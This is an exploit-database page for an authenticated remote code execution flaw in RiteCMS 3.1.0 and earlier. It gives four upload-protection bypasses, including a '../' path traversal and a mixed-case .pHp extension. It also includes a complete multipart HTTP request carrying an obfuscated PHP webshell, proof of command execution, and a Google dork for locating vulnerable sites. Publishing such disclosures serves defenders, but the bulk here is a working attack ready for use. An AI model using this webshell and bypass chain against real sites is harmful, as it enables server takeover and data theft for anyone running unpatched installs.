RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

vendor:

RiteCMS

by:

faisalfs10x

7.5

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: RiteCMS

Affected Version From: <= 3.1.0

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Ubuntu 18, XAMPP

2021

RiteCMS 3.1.0 – Remote Code Execution (RCE) (Authenticated)

RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. There are 4 ways of bypassing the current file upload protection to achieve remote code execution.

Mitigation:

Update to a version higher than 3.1.0 or apply the patch provided by the vendor. Ensure that proper access controls and file upload restrictions are implemented.

Source

Exploit-DB raw data:

# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597


"""
################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.

# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved

# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved

# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root

body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php

So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php

# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved

$ cat .htaccess

<Files *.php>
deny from all
</Files>

<Files ~ "webshell\.php$">
  Allow from all
</Files>


###################################
# PoC for webshell using Method 2 #
###################################

Steps to Reproduce:

1. Login as admin
2. Go to Files Manager 
3. Choose a directory to upload .php file either media or files directory. 
4. Then, click Upload file > Browse.. 
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory

Request:
========

POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file"; filename="webshell.pHp"
Content-Type: application/octet-stream

<?php system($_GET[base64_decode('Y21k')]);?>
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="directory"

media
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file_name"

-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize"

640
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="compression"

80
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------410923806710384479662671954309--


####################
# Webshell access: #
####################

# Webshell access via:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id

# Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

"""